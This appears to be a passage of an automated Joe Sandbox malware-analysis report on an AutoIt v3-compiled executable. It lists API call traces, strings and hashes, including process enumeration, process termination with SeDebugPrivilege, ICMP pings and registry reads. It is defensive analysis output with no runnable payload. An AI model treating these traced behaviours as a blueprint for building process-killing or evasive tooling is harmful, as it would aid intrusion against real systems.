                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                                        • API String ID: 98802146-2727554177

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00FB34DE
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00FB34ED
                                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00FB3503
                                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00FB3515
                                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00FB3527
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FB353F
                                                                                                                                                                                                                                                                                                        • RegisterClassExW.USER32(?), ref: 00FB3590
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: GetSysColorBrush.USER32(0000000F), ref: 00FB3657
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: RegisterClassExW.USER32(00000030), ref: 00FB3681
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB3692
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: InitCommonControlsEx.COMCTL32(?), ref: 00FB36AF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB36BF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: LoadIconW.USER32(000000A9), ref: 00FB36D5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB36E4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                                        • API String ID: 423443420-4155596026

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 01031019
                                                                                                                                                                                                                                                                                                        • inet_addr.WSOCK32(?), ref: 01031079
                                                                                                                                                                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 01031085
                                                                                                                                                                                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 01031093
                                                                                                                                                                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01031123
                                                                                                                                                                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01031142
                                                                                                                                                                                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 01031216
                                                                                                                                                                                                                                                                                                        • WSACleanup.WSOCK32 ref: 0103121C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                                        • String ID: Ping
                                                                                                                                                                                                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                                        • Opcode ID: 38acec30906ff1b18359ba082a1e29f45498e900c0e7dd140966111bf408f77a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9970a08ff34046ba61f3f7059060927557515c0d6463568f9a8129355d3280b9
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38acec30906ff1b18359ba082a1e29f45498e900c0e7dd140966111bf408f77a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1291BF71604241AFD720CF19C888F5ABBE5BF88318F0485A9F5A98B7A2C775ED45CB81

Control-flow Graph
Function starting at 00FB370F (control-flow graph rendering not preserved)
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00FB3709,?,?), ref: 00FB3777
                                                                                                                                                                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,00FB3709,?,?), ref: 00FB37A3
                                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FB37C6
                                                                                                                                                                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00FB3709,?,?), ref: 00FB37D1
                                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00FB37E5
                                                                                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00FB3806
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5069fb3fe5ecb4496a3841edf28ed0ab68d03f5780c572947372ea849799c8cd
                                                                                                                                                                                                                                                                                                        • Instruction ID: 181953097cc05fdc32778bd63ea49dfce6620c40d49dce9563c1d5d5ef840694
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5069fb3fe5ecb4496a3841edf28ed0ab68d03f5780c572947372ea849799c8cd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A4145F668C244BBDB246A69CD99BFC3AA5FB14310F204114F5C185284EE6ADB04FB62

Control-flow Graph
Function starting at 00FE90C5 (control-flow graph rendering not preserved)
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: bdac421ffab7791c835a2d202dbfead5b26ebfd7ba621249298d5c95629c619d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 458fddf755365821c46834bc53c7c86189a005fd3ad2db47268f1f6aee35d485
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bdac421ffab7791c835a2d202dbfead5b26ebfd7ba621249298d5c95629c619d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77C12771D083899FCF21DFAAC840BADBBB5AF09310F184059E555AB3D2C7B98942DB30

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                                                        • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                                                        • Opcode ID: 014aabfcec4483a1c33535506357f91f16e37fe222c0afa4d41c2c4ed59c1675
                                                                                                                                                                                                                                                                                                        • Instruction ID: f1b074ad0a3e46c59ca8570b9c6970dd26e96578acdeaee8de109c4277a28cbe
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 014aabfcec4483a1c33535506357f91f16e37fe222c0afa4d41c2c4ed59c1675
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 126269B4A08341CFD728DF15C585A9ABBE1BF88304F04896EE4D98B391DB35D945CF82

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0101DDAC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0101DDBA
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DD87: CloseHandle.KERNEL32(00000000), ref: 0101DE87
                                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0103ABCA
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0103ABDD
                                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0103AC10
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0103ACC5
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0103ACD0
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0103AD21
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                                        • Opcode ID: 640abfcaa04f9aec4a0b1dc71c38c0a530cfcf4540a4cd2e1edc990b7c9ae9f2
                                                                                                                                                                                                                                                                                                        • Instruction ID: aae196876d6a85b40dc8f6254b6cbeb515b10216ef3e9fb437abaf7af0d50abc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 640abfcaa04f9aec4a0b1dc71c38c0a530cfcf4540a4cd2e1edc990b7c9ae9f2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3961AC74314242AFE724DF19C488F55BBE5AF94308F14848CE9E68B7A3C775E845CB91

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 1062 fb35b3-fb3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FB35E1
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FB3602
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00FB3368,?), ref: 00FB3616
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00FB3368,?), ref: 00FB361F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0c9b4eaef1b5250e26f96e920a7e693259432b7b8d039be7875fd2d1757a5b00
                                                                                                                                                                                                                                                                                                        • Instruction ID: 44d53cf8b1d63fa6f565ee2d59b16369108106c24fca8c003434e2443c752c30
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c9b4eaef1b5250e26f96e920a7e693259432b7b8d039be7875fd2d1757a5b00
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62F05EB46443D47BE7314653AC58E3B3EBDE7C6F10F00402EB9C4A7154D26A0851DBB0

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FF5287
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FB6299
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                                        • API String ID: 2289894680-4094128768

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00FB58BE,SwapMouseButtons,00000004,?), ref: 00FB58EF
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00FB58BE,SwapMouseButtons,00000004,?), ref: 00FB5910
                                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00FB58BE,SwapMouseButtons,00000004,?), ref: 00FB5932
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Variable must be of type 'Object'., xrefs: 010048C6
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                                                        • API String ID: 0-109567571
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00FC15F2
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00FD09D8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD3614: RaiseException.KERNEL32(?,?,?,00FD09FA,?,00000000,?,?,?,?,?,?,00FD09FA,00000000,01079758,00000000), ref: 00FD3674
                                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00FD09F5
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                        • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                        • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 01038D52
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 01038D59
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 01038F3A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB32AF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB32B7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB32C2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB32CD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB32D5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB32DD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3205: RegisterWindowMessageW.USER32(00000004,?,00FB2964), ref: 00FB325D
                                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FB2A0A
                                                                                                                                                                                                                                                                                                        • OleInitialize.OLE32 ref: 00FB2A28
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 00FF3A0D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FB6299
                                                                                                                                                                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00FCFD36
                                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FCFD45
                                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0100FE33
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?,00FE894C,?,01079CE8,0000000C), ref: 00FE8A84
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00FE894C,?,01079CE8,0000000C), ref: 00FE8A8E
                                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00FE8AB9
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00FE97BA,FF8BC369,00000000,00000002,00000000), ref: 00FE9744
